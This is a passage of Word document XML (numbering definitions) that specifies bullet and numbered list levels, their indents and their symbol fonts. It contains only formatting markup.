      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1B8413D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E990EE46">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9D682502">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0BA01DEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE9A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7F60B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="9C6AF922">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="13F2959C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FAE48F2E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3EAA92CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="020A93EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E812982C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="72F818BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5F64DC28">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="91F021A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0FC6C87A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="51A23CE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="05A28414">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5B5C54EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4F7491A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4CFA9D2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4D4E1E56">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="50CC01CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B13859C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="18A6EB38">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="103DFCAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="6F547BE2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2EA0FE82">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="87A07C4E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="405A31A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="94980E4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DD80153C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="15F4939A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2520CA18">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6EE259AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="161B0FE9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="431C1DE6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="692ACA84">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B5921432">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="032C031E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0B1EFE2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9E049FA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9574FBB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3ADC6FC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="CFA22B7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="186A4C17"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="7C868F0C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="29DEA7E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="06462F6E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="16E23868">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="36A020A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0794F252">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C8806092">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="47668846">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="5082FD56">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="18FC3FFA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="A728155E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="389AB6E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7BA05036">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A10CCC7A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="F0EC4E50">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CE66CB30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="94CA72EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0DEEE056">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D6F6251C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="19382DAF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="E56A9024">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1CFA18CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="41720820">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="26F4CD00">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3334A4AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D2C69522">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C51412D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="97144B40">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6A526568">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="195D3031"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="F7BA4098">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8B2CA396">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3DCAF73A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
